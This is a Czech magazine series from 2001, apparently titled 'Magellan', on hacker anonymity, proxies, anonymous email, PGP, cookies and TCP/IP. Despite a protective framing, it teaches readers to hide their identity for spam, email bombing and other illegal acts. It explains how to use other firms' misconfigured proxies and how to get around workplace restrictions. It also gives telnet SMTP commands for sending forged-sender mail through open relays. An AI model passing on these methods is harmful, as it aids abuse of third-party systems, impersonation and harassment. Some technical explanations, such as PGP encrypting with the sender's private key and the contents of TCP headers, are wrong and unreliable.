Magellan
(12.9.2001)

Máte už dost všech těch řečí o nebezpečnosti počítačových pirátů, těch démonů informační superdálnice, kteří si brousí zuby na data právě z vašeho počítače? Také už vám jdou na nervy všechny ty palcové titulky v nejčtenějších periodikách, které v dobách okurkové sezóny plánovitě rozmělňují kauzy i těch nejstupidnějších makrovirů nebo pokusů 13-letých týpků, kteří využijí superrychlé optiky školy, stáhnou si několik tutorialů pojednávajících o metodách zahlcování serverů a pokoušejí se „shodit“ altavista.com?
Rozhodně nejste sami. Právě toto jsou totiž příběhy naprostých zelenáčů a rádoby-pirátů (anglofonní jedinci pro ně mají nádherné označení „wannabies“), kteří se dříve nebo později díky vlastní blbosti anebo mladické snaze o publicitu dostanou do pořádného průseru. Znalosti ani osudy těchto lidí nás rozhodně nebudou zajímat.

Chcete se dozvědět doopravdy, jak to chodí tam na druhé straně? Máte chu» alespoň nahlédnout do temnot kyberprostoru, kde se na kryptovaných IRC kanálech schází ta opravdová elita, lidé kteří znají zadní vrátka většiny operačních systémů na světě, ti kteří se účastní prestižních soutěží o co nejrychlejší průnik do co největšího počtu počítačů s různými operačními systémy? (Přesně taková soutěž probíhá na největší mezinárodní hackerské slezině Defcon (www.defcon.org), která se každoročně koná ve Spojených státech: Jednotliví hackeři se snaží proniknout do ostatních počítačů umístěných na interní síti, z nichž každý má nainstalovaný jiný operační systém – tedy záležitost nikoliv pro ořezávátka. Hackeři totiž zároveň bývají nejlepšími počítačovými správci. Jen pro zajímavost, ruský kyberpunker Dimitrij Skliarov, kterému se podařilo prolomit ochrannou šifru textových dokumentů pro elektronické knihy od Adobe, byl agenty FBI zatčen v momentě, kdy si v hotelovém pokoji balil fidlátka právě po skončeném Defconu.).

Musíte si uvědomit jedno: Tím opravdovým počítačovým pirátem je ten, o kterém tuto skutečnost nikdo neví. Pokud někdo touží po tom poškodit cizí server, bude mu k tomu stačit pár jednoduchých utilitek, které během několika hodin hledání spolehlivě nalezne (například přes http://astalavista.box.sk/, server opravdu napěchovaný vším, co je třeba). Jenže o nic takového nám nejde. Cílem tohoto seriálu je upozornit na odvrácenou tvář internetu, protože k tomu, abyste se mohli chránit, potřebujete základní informace o tom, jak to všechno funguje a co vám kdo může provést. Také si budete moci zahrát na špióny a nahlédnout trošku do soukromí jiných uživatelů. Seriál je určen běžným uživatelům internetu, nikoliv budoucím hackerům, ti si mohou hledat cestu ke slávě nebo k průšvihu jinde.

Pro začátek si uvedeme hackerský manifest, motto celé hackerské komunity, které přesně vystihuje o co těmto nadaným chlapíkům (nejsem sexista, ale hackerek je na světě opravdu poskrovnu) vlastně jde.

This is our world now... the world of the electron and the switch, the beauty of the baud.
We make use of a service already existing without paying for what could be dirt cheep if it wasn't run by profiteering gluttons, and you call us criminals. We explore... and you call us criminals. We exist without skin color, without nationality, without religious bias...and you call us criminals. You build atomic bombs, wage wars, murder, cheat, and lie to us and try to make us believe it is for our own good, yet we're the criminals.
Yes, I am a criminal. My crime is that of curiosity. My crime is that of judging people by what they say and think, not what they look like. My crime is that of outsmarting you,something that you will never forgive me for. I am a hacker and this is my manifesto. You may stop this individual, but you can't stop us all... after all, we're all alike.

Tohle je teď náš svět.. svět elektronu a přepínače, krásy baudu. Využíváme zdarma služeb, které by mohly být téměř zadarmo pokud by nepatřily ziskuchtivým hltounům, a vy nás proto nazýváte kriminálníky. My objevujeme a vy nás nazýváte kriminálníky. Jsme tu bez ohledu na barvu kůže, národnost nebo náboženskou zaujatost a vy nás nazýváte kriminálníky. Vy vyrábíte atomové bomby, vedete války, vraždíte, podvádíte a lžete nám a snažíte se nás přinutit věřit tomu, že tohle všechno děláte pro naše vlastní dobro. Ale pořád jsme my ti kriminálníci.
Ano, já jsem kriminálník. Můj zločin je zvědavost. Mým zločinem je, že hodnotím lidi podle toho co říkají a jak myslí a nikoliv podle toho jak vypadají. Mým zločinem je, že jsem chytřejší než vy a to mi nikdy nedokážete odpustit. Jsem hacker a tohle je můj manifest. Můžete zastavit jednotlivce, ale nemůžete nás zastavit všechny. Konec konců, jsme všichni stejní.

A ještě malý disclaimer: Informace, které najdete v tomto seriálu včetně odkazů na webové stránky a jiné zdroje, využívejte, jak uznáte za vhodné. V každém případě si ale uvědomte, že je to vaše zadnice, která se může docela rychle dostat do eskalujících problémů. K síti přistupujte s respektem a vždy předpokládejte, že ten „na druhé straně“je lepší než vy (jistě, běžná sekretářka hodinu hledající písmeno „P“ na klávesnici je jiný případ). Nechovejte se jako puber»áci vytahující se před spolužačkami. Počítačové pirátství je tenký led, kterým vmžiku zahučíte do studené vody, ze které taky nemusí být cesta zpátky.

Stopy, které zanecháváte

Jak už bylo řečeno, nejdůležitější prioritou každého počítačového piráta musí být starost o vlastní záda, o bezpečnost a neviditelnost sama sebe. Tohle mějte vždy na paměti, a» už se snažíte bombardovat e-maily toho nenáviděného maníka, co vám přebral holku, anebo tahat informace z počítačů NASA. Internet není bezpečný a budete se divit, kolik informací je možné o vás získat i při naprosto nevinném pohybu po zpravodajských webových stránkách. Svá data s sebou při pohybu po superdálnici taháte s sebou napsaná na hrudi, stačí se jen podívat. Abyste při čemkoliv, co děláte, zůstali bezpeční, musíte být v každém případě anonymní, a právě to bude téma první části našeho seriálu.

Uvedeme si malý příklad. Nastartujete počítač připojený k Internetu (je jedno, jestli využíváte běžnou telefonní linku, Telecomem nyní tolik inzerované ISDN, anebo jakýkoliv druh permanentního připojení), rozběhnete internetový prohlížeč (Internet Explorer, Netscape, Operu, zkrátka cokoliv) a vy»ukáte do příkazové řádky jakoukoliv adresu webového serveru – třeba http://www.google.com/. Už v ten moment o vás bude správce tohoto serveru vědět následující informace:

1. Vaši IP adresu
2. DNS název vašeho počítače nebo serveru (o IP, DNS a protokolech Internetu si podrobně povíme jindy)
3. Kontinent a zemi, ve které se nacházíte
4. Město nebo vesnici, ve kterém se právě nacházíte
5. Podrobnosti o vašem poskytovateli internetového připojení
6. Typ a verzi vašeho internetového prohlížeče
7. Typ a verzi vašeho operačního systému
8. Grafické rozlišení na vašem monitoru
9. Barevnou hloubku monitoru, kterou právě používáte
10. Všechny webové adresy, které jste předtím po zapnutí počítače navštívili

Zdá se vám to neuvěřitelné? Jenže je to tak, a přitom získání výše uvedených informací je naprosto standardní záležitost. Nemusíte být žádný hacker, abyste si všechno tohle zjistili. Pokud hacker budete, dozvíte se toho mnohem víc.

Nyní už vám musí být jasné, že za těchto podmínek je pokus o cokoliv ilegálního čirým bláznovstvím. Nejen při surfování na webu nabízíte ostatním uživatelům k nahlédnutí spoustu informací o sobě. Podobným způsobem to funguje i při tlachání na IRC nebo ICQ, při hraní on-line her apod.

I pouhá vaše e-mailová adresa dokáže vyzradit spoustu informací. Dejme tomu, že se jmenuji Tomáš Novák a moje e-mailová adresa je například tnovak@atlas.cz. Kdokoliv mi bude chtít na Internetu uškodit, celkem lehce si z e-mailové adresy domyslí, že mé příjmení je Novák a křestní jméno začíná na T. Taky bude vědět, že s vysokou pravděpodobností přistupuji na Internet prostřednictvím modemu (služeb těchto veřejných poskytovatelů zase tolik majitelů pevných linek nevyužívá) a zná mého poskytovatele e-mailových služeb. Vzhledem k tomu, že je dnes naprosto běžné k e-mailu nabídnout i několik MB místa pro webovou prezentaci, bude nejspíš existovat i něco na způsob http://www.atlas.cz/tnovak. K nahlédnutí budou i registrační údaje o uživateli, které server vyžaduje (většinou z marketingových pohnutek) při zaregistrování – světe div se, spousta uživatelů o sobě prozradí skoro všechno, v drtivé většině případů jméno a příjmení, bydliště a věk. Najít si telefonní číslo tohoto konkrétního T. Nováka ve Zlatých stránkách nebo na on-line vyhledávači Telecomu (odkazy na http://www.iol.cz/) nedá moc práce.

Zajímavá služba se nachází na adrese http://whowhere.com/. Schválně zkuste vložit své jméno a mnohdy se budete divit, co všechno se o vás ví. Prozatím je whowhere orientován spíše na severoamerické reálie, ale jeho chapadla se roztahují i do Evropy a je jen otázkou času, kdy na vás v okně Exploreru vyskočí hezky setříděné informace o půlce vaší rodiny.

Nyní tedy víte, že na Internetu jste s využitím standardních prostředků jednoduše identifikovatelná osoba a zjistit o vás vše potřebné není pro zasvěceného člověka sebemenší problém. Otázkou je, jestli je nějakým způsobem možné zajistit, abyste se stal pro ostatní anonymní? Samozřejmě že ano, alespoň v omezené míře, protože cesta k vašemu počítači a tudíž i k vaší fyzické identitě vždycky existuje. Jde jen o to, jak dobře ji zamaskujete.

Proxy

Proxy, nebo proxy-server je první z možností, jak zakrýt svou pravou identitu. Proxy byla původně vyvinuta k tomu, aby bylo možné urychlit internetovou komunikaci v dobách, kdy světu vládly opravdu pomalé modemy a ani pevné linky nebyly zdaleka v té podobě, jak je známe dnes.
Proxy je počítač, který za vás vyřizuje vlastní komunikaci s jiným vzdáleným počítačem. Znamená to, že nejprve se připojíte na proxy (ve vedlejší místnosti nebo na druhé straně zeměkoule) a z ní teprve dál do světa.

Původní funkcí proxy bylo a je toto: Dejme tomu, že si budete chtít prohlédnout webovou stránku své oblíbené japonské populární kapely (ano, trochu úchylné, ale jako příklad to bude stačit), jejíž web je fyzicky umístěn – kde jinde než – v Japonsku, tedy na druhé straně světa. Do příkazové řádky vašeho prohlížeče vy»ukáte adresu webu, ale požadavek na spojení nepůjde do Japonska, nýbrž do proxy serveru, který běží v centrální serverovně vašeho poskytovatele – proxy zjistí, jestli tento web před vámi náhodou už někdo z ostatních zákazníků stejného poskytovatele nenavštívil, a pokud ano, jeho obsah bude uložen v tzv. cache (odkladiště na diskovém poli vašeho providera), odkud stahování poběží mnohem rychleji než z Japonska a zároveň jsou tak šetřeny mezinárodní linky. Z originálního webu v Japonsku budou staženy jen aktualizované informace. V případě, že se pokusíte navštívit hodně známou a periodicky využívanou stránku (třeba http://www.altavista.com/), úspory na lince jsou nezanedbatelné.

Co je ale pro proxy podstatné pro naše povídání, je skutečnost, že právě proxy za vás provádí veškerou komunikaci s webovými stránkami, tudíž namísto vašich informací jsou ke vzdáleným serverům odesílány informace o proxy serveru vašeho poskytovatele. Simsalabim, najednou jste pro svět webu anonymní (s výjimkou informací, které o vás samozřejmě má vlastní proxy server).

Na internetu existují desítky, možná stovky veřejně přístupných proxy serverů, které vám pro běžné surfování zajistí dostatečnou anonymitu. Většina z nich za větší či menší peníz nabízí i pokročilejší služby včetně anonymního mailování apod.
Notoricky známý je http://www.anonymizer.com/, seznam jinak dostupných proxy serverů najdete například na adrese www.cyberarmy.com/lists, ale i hesla „anonymizer“, „anonymous surfing“, „public proxy“ vložená do většiny známých vyhledávačů vám nabídnou spoustu možností. Nakonfigurovat váš počítač tak, aby veškerá webová komunikace využívala vzdálené proxy je jednoduchá. V kterémkoliv prohlížeči v menu najděte „možnosti připojení“ a najděte část pojednávající právě o nastavení proxy. Zatrhněte „používat proxy“ a doplňte informace o proxy, kterou jste se rozhodli využívat.

WinGate, SyGate

WinGate je program, který umožňuje změnit počítač běžící na operačním systému Windows v klasické proxy. Důvodů může být několik:

1. holt jste majitel anebo zaměstnanec některého providera a rádi byste proxy nainstalovali pro své zákazníky
2. chcete aby se váš počítač na pevné lince stal proxy serverem
3. chcete připojit další počítače připojené na vaši lokální sí» na Internet tak, aby jako mezičlánek fungoval právě váš počítač (přesně tento princip využívá drtivá většina malých firem pro přístup na Internet: na firemním serveru - který je jako jediný počítač ve firmě přímo fyzicky napojen do Internetu - v drtivé většině případů běží notoricky známá WinProxy, která umožňuje všem ostatním počítačům ve vnitrofiremní síti přistupovat na Internet)

Pokud jste zaměstnanec takové firmy, úřadu nebo školy využívající proxy serveru, pak při přistupování (nejen) na webové stránky budete navenek vypadat jako vlastní proxy server – znovu nebude nikdo znát vaši pravou identitu.
Zajímavým trikem je vyhledat cizí proxy a využít ji pro svůj prospěch. WinGate aplikace běží standardně na portu 1080 (o portech si také brzy řekneme něco podrobnějšího), proto se drzému počítačovému korzárovi může při troše štěstí podařit najít proxy server dejme tomu na adrese cizifirma.cz, který nebude dobře nakonfigurován tak, aby poznal, že dotyčný není zaměstnanec firmy. Pak si jednoduše do prohlížeče nastaví jako proxy server „cizifirma.cz“ a port „1080“ a hurá, je anonymní.

Bouncer

Bouncer je vzdálený systém, který veškerou vaši internetovou komunikaci (je úplně jedno, jestli brouzdáte po webových stránkách anebo tlacháte na IRC) přesměrovává dál, takže to v praxi vypadá, jako byste seděli přímo za bouncerem a ne za vaším počítačem. Je to vlastně podobný princip jako u proxy – rozdíl je v tom, že proxy zpracovává jen přesně definované části vaší komunikace, zatímco bouncer zpracovává všechna data, která od vás obdrží.

Všimli jste si například všech těch šílených adres na IRC, kdy se uživatelé připojují z prapodivných strojů jako mulder@fbiagent.com nebo psychopat@russian-mafia.net apod.?
Tohle všechno funguje právě díky bouncerům. Uživatel se nejprve připojí z dejme tomu firma.cz na bouncer russian-mafia.net a odtud dál komunikuje se světem jako někdo úplně jiný.

Bouncer je skvělý i v případě, že vám firma nebo škola nedovolí dělat na Internetu věci, které byste si přáli. Je spousta organizací, které svým zaměstnancům nebo studentům povolí například jen odesílání e-mailů a surfování po webových stránkách. Ale co když byste si rádi popovídali s kamarády prostřednictvím ICQ nebo IRC nebo si chcete stáhnout nějaké nové hry z FTP serveru? Pomoc je následující: Najděte si kamaráda, který má počítač napojený na pevnou linku a nemá jakákoliv omezení pro připojení, a poproste jej, aby si na svém počítači nainstaloval bouncer a umožnil vám se k němu připojit (prostřednictvím standardního portu 80, po kterém běhá webová komunikace). Existují speciální bouncery, které přesně poznají, co právě zamýšlíte udělat a „přepnou“ vás na ten správný port. Váš šéf ani správce vaší sítě nemusejí vůbec nic poznat.

Magellan
(17.9.2001)

Anonymní e-mail

Pro bombardování e-maily, rozesílání spamu a podobné odsouzeníhodné činnosti samozřejmě nikdy nepoužívejte svoji reálnou adresu. To je pravidlo číslo jedna. První a nejjednodušší způsob na získání anonymity je prosté zřízení e-mailového účtu na kterémkoliv serveru, který tyto služby nabízí (vol.cz, seznam.cz, quick.cz, email.cz, hotmail.com, yahoo.com atd. atd.).
Je jasné, že nebudete uvádět žádné pravdivé informace o sobě a ani login nebude mít žádnou spojitost s vaší osobou (takže například velkej.drsnak@email.cz poslouží obstojně J ).

Maily odesílané z této adresy budou dostatečně anonymní, ale zase se musíte rozloučit se skopičinami typu spamming a e-mailové bombardování, protože přesně tohle vám všechny veřejné servery nedovolí – z čistě prozaických zdrojů: chrání si totiž výkon svých serverů a hlavně kapacitu linky, kterou najednou mnohdy využívají tisíce lidí.

Dobrou volbou jsou anonymní re-mailery, kterých při troše trpělivosti taky pár najdete. Těch veřejných ale pomalu a jistě ubývá, takže pokud uvedu jakýkoliv link, pak pravděpodobnost, že bude za týden nefunkční, se rovná jedné.

Naprosto nejdokonalejším způsobem odesílání anonymních e-mailů je využití sendmailových služeb cizích vzdálených systémů, na které se vám podaří připojit. Opět bude stačit trocha hledání, protože takto „otevřených“ systémů jsou i v naší republice stovky.

Postup je následující:

1. Vyhledejte vzdálený systém, který vám umožní připojit se na jeho port 25
2. Pokud součástí vašeho systému není komunikační software TELNET (je standardní součástí Windows, ale můžete využít i komerční nebo freeware/shareware náhrady běžně dostupné na internetu)
3. V menu se proklikejte do položky TERMINAL/PREFERENCES a odfajfkujte „LOCAL ECHO“ na zapnuto – budete tak moci lokálně sledovat hlášky vzdáleného systému
4. Připojte se na vzdálený systém na port 25 – v menu CONNECT vyberte REMOTE SYSTÉM a zadejte: HOST (jmeno.serveru.cz) a PORT (25)
5. Klikněte na CONNECT. Pokud máte správně nakonfigurované připojení a vzdálený server odpovídá, měli byste se úspěšně připojit a uvidíte příkazovou řádku
6. Zkuste příkaz „HELP“ a stiskněte ENTER. Poznáte tak, jestli vzdálený systém v pořádku odpovídá a reaguje na vaše příkazy.
7. Nyní se pokuste odeslat vlastní e-mail ze vzdáleného systému. Je zajímavé, že jako adresu odesílatele vám systém umožní zadat prakticky cokoliv, takže se klidně zkuste vydávat za odesílatele slon@v.nedaleke.zoo.cz
8. Zadávejte postupně tyto příkazy a vždy stiskněte ENTER. Pozor na to, že nebude fungovat klasická editace textu (klávesy BACKSPACE a DEL), takže pokud něco napíšete špatně, už to tak zůstane. Texty v závorkách jsou komentář, ty samozřejmě nevypisujte:

HELO doména (má funkci pozdravu se systémem, namísto „doména“ napište jakoukoliv existující doménu, například nova.cz)

MAIL FROM: vase.adresa@cokoliv.cz (adresa odesílatele, cokoliv.cz musí být existující doména, například opět nova.cz, ale můžete použít například domény vyššího řádu – chairman.nova.cz apod.)

RCPT TO: prijemce@adresa.cz (adresa komu email posíláte)

DATA

SUBJECT: cokoliv (zde zadejte předmět emailu)

FROM: (od koho)

TEXT EMAILU, ZA KAZDYM RADKEM STISKNI ENTER

. (text e-mailu ukončíte samotnou tečkou na začátku řádku a ENTER)

 

Šifrování

Nikdy nemáte jistotu, že někdo náhodou nečte vaši poštu. Víte snad určitě, že se nad e-maily, které v práci odesíláte milence, ve vedlejší kanceláři nebaví správce vaší sítě? A co když jsou informace, které si vyměňujete s obchodními partnery, natolik důležité pro vaši konkurenci, že si najmou hackera, aby se prolomil do vašeho mail serveru a vaši poštu monitoroval. Nebo snad řídíte českou pobočku Camorry a rozesíláte elektronické žádosti o výpalné?
Vždy předpokládejte, že vaši poštu někdo čte. Proto používejte v případě potřeby šifrování, které vám zaručí skoro dokonalou bezpečnost a nečitelnost vaší elektronické komunikace. Nejlepší volbou je PGP (Pretty Good Privacy). Všechny potřebné informace včetně popisu jak této silné šifry využít pro e-mailovou korespondenci naleznete na adrese http://www.pgpi.com/.

Princip PGP je založen na existenci dvou klíčů. Klíč si představte jako různě dlouhou posloupnost znaků (malých i velkých písmen, číslic i speciálních znaků, které najdete na klávesnici). Představte si příklad klasické loterie, kde máte uhodnout 6 čísel ze 40. Přitom počet kombinací čítá miliony, takže trefit se do té správné kombinace je otázkou štěstí vyvolených. A teď si představte, že PGP umí využívat klíče, které jsou například 4.000 znaků dlouhé – na Zemi neexistuje dostatek systémových prostředků k tomu, abyste podobný klíč nějakým způsobem spočítali, neřkuli trefili od oka.

Poté, co si nainstalujete PGP na svůj počítač a poprvé jej spustíte, tak PGP vygeneruje automaticky dva jedinečné klíče – tzv. privátní (ten je určen pouze vám a nikomu jinému, proto si jej dobře uschovejte) a klíč veřejný, který pošlete komukoliv, kdo s vámi bude komunikovat šifrovaně prostřednictvím PGP. Pokud se rozhodnete odeslat šifrovaný e-mail například nějakému Frantovi, pak pro zakódování zprávy použijete svůj privátní klíč a Frantův klíč veřejný (šifra je neuvěřitelně složitá matematická rovnice, kde oba klíče fungují jako proměnné). Franta na druhé straně zeměkoule (nebo na druhé straně kanceláře) váš e-mail obdrží a dešifruje jej prostřednictvím svého privátního klíče a vašeho veřejného klíče. Jsou tak zaručeny hned dvě věci – jednak nikdo jiný kromě Franty nemůže váš e-mail rozšifrovat (jenom Franta zná svůj privátní klíč) a Franta má navíc jistotu, že e-mail určitě pochází od vás a není podvržený někým jiným (jenom vy totiž můžete zakódovat zprávu svým vlastním privátním klíčem). Stejně funguje tolik diskutovaný princip elektronického podpisu.

Cookies

Určitě jste si při svých toulkách kyberprostorem všimli, že webové stránky jsou mnohdy až podezřele chytré a „pamatují“ si o vás hromadu informací. Jak je možné, že vám webová stránka automaticky nabídne váš login, který jste minule použili, a pamatuje si, ve které části webu jste minule skončili? Nákupní servery vědí, co jste minule vložili do nákupního košíku a chatovací stránka už po vás příště nechce vstupní heslo a přesto pozná, že jste to vy?

Tohle všechno mají na svědomí cookies – malé soubory, které na přesně určeném místě na vašem harddisku vytvářejí právě webové stránky. Cookies jsou standardním vybavením všech aktuálních prohlížečů, takže v případě, že nechcete, aby váš šéf mohl zjistit, že si v práci prohlížíte porno stránky anebo že na firemní kreditní kartu kupujete na on-line obchodech, pak používání cookies jednoduše zakažte, respektive nařiďte počítači, aby se vás zeptal kdykoliv se webovská stránka pokusí cookies na vašem počítači vytvořit.
Dobrý nápad je existující cookies smazat, to samozřejmě jen v případě, že je tam nechcete. U Windows i Maintoshů se cookies nacházejí v podadresáři /COOKIES tam, kde máte nainstalovaný prohlížeč (Například C:\Program Files\Internet Explorer\Coookies\). U operačního systému UNIX a jeho verzí (včetně Linuxu) jsou cookies většinou ukládany někde ve vašem domácím adresáři (/home/váš.login, /usr/váš.login, /usr/local/váš.login apod.)

Internetové prohlížeče navíc ukládají historii vašeho surfování, tzn. informace o tom, které webové stránky jste navštívili. Samozřejmě nabízejí možnost obsah této historie vymazat, resp. vůbec neukládat, což vřele doporučuji pro vaši anonymitu. Na tato pravidla dbejte hlavně tehdy, pokud jeden počítač sdílíte s více lidmi (školní učebny, internetové kavárny apod.)

Spoofing

Spoofing v kyberprostoru vždy znamená předstírání něčeho, co ve skutečnosti není pravda. V následující kapitole si povíme o tom, jak vlastně v praxi probíhá komunikace na internetu, o paketech, o přenosu dat, IP adresách a portech. Spoofing je piráty velice často využívaná metoda, kdy je v odesílaných datech přepsána originální informace něčím jiným. Nejčastěji se spoofují IP adresy uživatele. Tzn. že se snažíte, aby si všichni okolo mysleli, že přistupujete na Internet z jiné IP adresy, než kterou opravdu máte. Ale o tom později, protože nejdříve si v příští kapitole probereme již zmiňované teoretické i praktické základy přenosu dat na Internetu a protokol TCP/IP, který je grálem celého Internetu.

Magellan
(3.10.2001)

Minule vám bylo vtloukáno do hlavy, že tím nejlepším pirátem je ten, o kterém to nikdo neví. Proto jsme se věnovali tomu, jak vlastně zařídit, abyste při svých nekalých toulkách po kybernetické superdálnici byli anonymní a neodhalitelní, a» už se snažíte provést cokoliv. Teď už znáte základy a víte, jak na to. Jenže jak vlastně celý ten šílený galimatyáš počítačů, serverů, switchů a hubů (vyslovuj „habů“) vlastně funguje? Kdo celou tu sí» řídí a co je v jejím pozadí? Jak je možné, že e-mail si neochvějnou přesností najde cíl své cesty, by» by byl na druhé straně zeměkoule? Jak to, že si jediným kliknutím myši přes oceán stáhnete své utilitky? Není v tom trocha voodoo?
Ne, ani trochu. Celý ten utěšeně se rozrůstající elektronický organismus má přesně stanovená pravidla, svoji DNA, podle které funguje i ta poslední nicotná operace na síti.

S počítači a jejich vzájemnou komunikací je to stejné jako s auty a řidiči v silničním provozu. Pokud byste se chtěli pokusit propojit dva počítače do sítě, budete k tomu potřebovat kus kabelu a nějaký systém, jehož prostřednictvím si tyto dva počítače budou navzájem rozumět. Tomuto systému se říká protokol – soubor pravidel, kterými se řídí elektronická komunikace. Co třeba přenést malý soubor z jednoho počítače na druhý, podobně jako na disketu? Nic složitého, dalo by se říct. Jenže lidé jsou bytosti vynalézavé a připravili si na sebe všechny ty e-maily, weby, servery, routery, chtějí stahovat programy, hrát spolu na dálku hry, ovládat všelijaké přístroje, posílat pohyblivé obrázky a kdo ví co ještě. Navíc všechny ty tisíce, možná miliony počítačů zapojili do jedné obrovité sítě, která se každým dnem zvětšuje. Aby se tohle všechno dalo vůbec zvládnout, vznikl ne jeden, ale hned celá řádka protokolů, podle nichž se komplikovaný provoz na superdálnici řídí.

Tento soubor pravidel se všeobecně označuje jako protokol TCP/IP, z anglického „Transmission Control Protocol / Internet Protocol“ (Protokol pro ovládání přenosu / Internetový protokol). Jeho princip spočívá v rozdělení celého procesu elektronického přenosu dat do vrstev (anglicky „layers“), mezi kterými vlastní komunikace probíhá. Pro vaši informovanost vyjmenuji jednotlivé vrstvy přesně tak, jak jsou protokolem TCP/IP definovány a využívány, nicméně pro běžného uživatele to není podstatné. Důležité je si uvědomit princip, jak to celé funguje.

1. vrstva vlastní připojení počítače (sí»ový hardware)
2. sí»ová vrstva (ne-fyzická definice spojení počítačů do sítě )
3. transportní vrstva (fyzický přesun dat)
4. aplikační vrstva (používaný software, operační systémy)
5. fyzická vrstva (není součástí TCP/IP) – datové kabely, telefonní linky atd.

 Představme si vše v praxi. Píšete text e-mailu v Outlook Expressu, který je součástí operačního systému Microsoft Windows. Kliknete na ikonku „Odeslat“ a většinou už za pár vteřin (záleží na rychlosti vašeho připojení k Internetu) se vašemu příteli dejme tomu v Nizozemsku objeví informační okno na jeho Macintoshi hlásající, že obdržel novou poštu. Jednoduché a funkční, takže většina lidí se nad cestou, kterou data musejí po superdálnici urazit, ani nezamyslí. Tak to pojďme napravit:

 Nejprve napíšete text krátkého e-mailu, který existuje pouze v paměti vašeho počítače, kterou v tu chvíli ovládá Outlook Express. Pak kliknete na „Odeslat“ a celá pou» začne. Outlook je v tomto případě první vrstva komunikace, která předává text e-mailu operačnímu systému (Windows) s tím, že po nich požaduje, aby tato data byla odeslána na místo určení. Windows jsou tak další vrstvou, přes kterou data protékají. Operační systém spravuje sí»ovou kartu – kus hardware, který spojuje váš počítač s vnějším světem (v případě telefonického připojení k internetu je tímto spojovacím článkem modem) – a máme tu další vrstvu. Od sí»ové karty se data ženou kabeláží (nebo vzduchem) internetem nejprve k serveru vašeho internetového providera, pak (v ideálním případě bez mezičlánků) na server providera příjemce, k jeho sí»ové kartě, kterou obsluhuje MacOS jeho Macintoshe a dále do poštovního klienta příjemce (což může být také Outlook Express ve verzi pro Macintosh nebo jakýkoliv jiný poštovní software)

 Shrnuto: Outlook – Windows – sí»ová karta – Internet – sí»ová karta – MacOS – klient

 Cesta, kterou data urazí, je takto opravdu zjednodušena, ve skutečnosti je vše ještě mnohem složitější.

 TCP/IP totiž nemá na starosti jen vlastní přesun dat, ale i jejich bezpečnost a celistvost. Na celé té dlouhé cestě od odesílatele k příjemci je totiž čeká spousta nebezpečí – přechody mezi mnoha počítači s různými operačními systémy, nekonečné kilometry kabeláže, satelitní a podmořské přenosy a spousta dalších zapeklitostí. Mohou se tak vyskytnout dva základní problémy, které způsobí to, že přesunovaná data nedorazí do místa určení v pořádku:

-          poškození dat

-          jejich ztráta

 Aby k něčemu podobnému nedošlo (a pokud se tak stane, aby se na problém okamžitě přišlo a mohl tak být bez interakce s uživatelem vyřešen), je protokol TCP/IP vybaven chytrým kontrolním mechanismem. Jednotlivá data nejsou nikdy po internetu přesunována vcelku. Pokud pošlete deset tisíc znaků textu jako e-mail a k němu přiložíte dva megabajtové obrázky, nepočítejte s tím, že počítač celý e-mail odešle jako balík (jako byste například e-mail i s přílohami kopírovali na disketu). Data jsou vždy rozdělena na stejně dlouhé části (říká se jim pakety), odesílané zvláš» jeden za druhým.

Každý takovýto krátký segment dat – tedy paket – je opatřen hlavičkou (oficiálně se jí říká „TCP hlavička“) obsahující všechny důležité informace – na kolik paketů byl původní soubor rozdělen, kolikátý je tento konkrétní paket v pořadí, určení důležitosti přenosu apod. Každý paket je proto samostatně cestující jednotkou mířící k cíli, přičemž je vcelku jedno, jestli desátý paket v pořadí dorazí k cíli dříve než první – přijímací počítač si je podle jejich hlaviček seřadí pěkně za sebou. Velikost paketů je možné pro každý počítač nastavit individuálně, většinou jsou využívány pakety s velikostí menší než 1 kilobajt (1024 znaků), 300 nebo 600 bajtů dlouhé.

Navíc je důležité uvést, že pro každý odesílaný paket je proveden jeho kontrolní součet podle algorytmu, který je součástí protokolu TCP/IP. Výsledkem kontrolního součtu je cifra, která je také obsažena v TCP hlavičce paketu. Přijímající server provede naprosto shodný výpočet u každého paketu, který obdrží, a výsledek srovná s hodnotou v TCP hlavičce. Pokud se obě čísla rovnají, je všechno v pořádku a data dorazila celistvá a v nezměněné podobě. V případě, že tomu tak není, je vydána žádost na opětovné zaslání paketu od odesílatele.

Prakticky to funguje takto: Budete například odesílat balík dat o velikosti 18.000 bajtů (znaků). Většina světových sítí nedokáže zvládnout tak velké pakety, proto bude tento balík rozdělen například na 60 paketů o velikosti 300 bajtů. Každý z nich bude vybaven vlastní TCP hlavičkou udávající odkud a kam paket cestuje, jak je velký, co má obsahovat (ve formě kontrolního součtu), kolik těchto paketů celkem je a kolikátý v řadě je každý z nich. Takto nakouskovaná data se vydají na superdálnici k cílovému počítači. Ten je přijme, zkontroluje jejich integritu (provede vlastní kontrolní součet a porovná ho s tím, který je obsažen v TCP hlavičce – pokud se hodnoty rovnají, jsou data v pořádku) a poskládá je za sebe podle pořadí, přičemž samozřejmě zkontroluje, jestli jsou opravdu všechny a žádný nechybí.
A ejhle, nepoškozený balík dat je na druhé zemské polokouli.

O rozdělení původně velkého souboru na pakety a jeho následné seskládání na straně příjemce se stará právě TCP protokol (včetně opětovného odeslání poškozených nebo ztracených paketů tak, aby mohl být přenášený soubor uveden do původní podoby bez ztráty integrity).

Transfer dat a kontrolu jejich přenosu tedy známe. Jak ale počítače ví, kam jednotlivá data vlastně poslat? Na světě jsou miliony nejrůznějších počítačů a operačních systémů, tak jak je možné, že se na cestě neztratí a v drtivé většině případů dorazí k cíli?

Odpověď je nasnadě. Byl totiž vytvořen vcelku jednoduchý systém přidělování adres jednotlivým počítačům. Stejně jako na poštovní obálku napíšete adresu vaší pratety užívající š»astně důchodu na Bahamských ostrovech, podobně budou jednotlivé pakety směřující superdálnicí znát adresu odesílatele i adresu příjemce, přitom funkci elektronického katastru nemovitostí je v tomto případě druhá část protokolu TCP/IP – IP (Internet Protocol).

Jakákoliv stanice (ano, i váš počítač) fungující na Internetu na bázi protokolu TCP/IP musí mít přidělenu jedinečnou adresu (budeme jí říkat „IP adresa“), jejíž prostřednictvím je nezaměnitelně identifikovatelná nezávisle na své fyzické pozici. Pokud jednou váš počítač obdrží konkrétní IP adresu, už nezáleží na tom, jestli jej přenesete o patro níž nebo na druhý konec kontinentu – v Internetu bude identifikovatelný pokaždé.

Jednotlivé IP adresy přiřazuje agentura InterNIC (Internet Network Information Center), a to většinou jednotlivým poskytovatelům Internetu v určitém rozsahu (setkáte se tak v praxi s pojmy „rozpětí adres“ nebo „adresový prostor“). Právě poskytovatelé Internetu (CesNet, Telecom, CzechOnLine, GTS, Aliatel apod.) přiřazují konkrétní IP adresy koncovým uživatelům a jednotlivým počítačům.

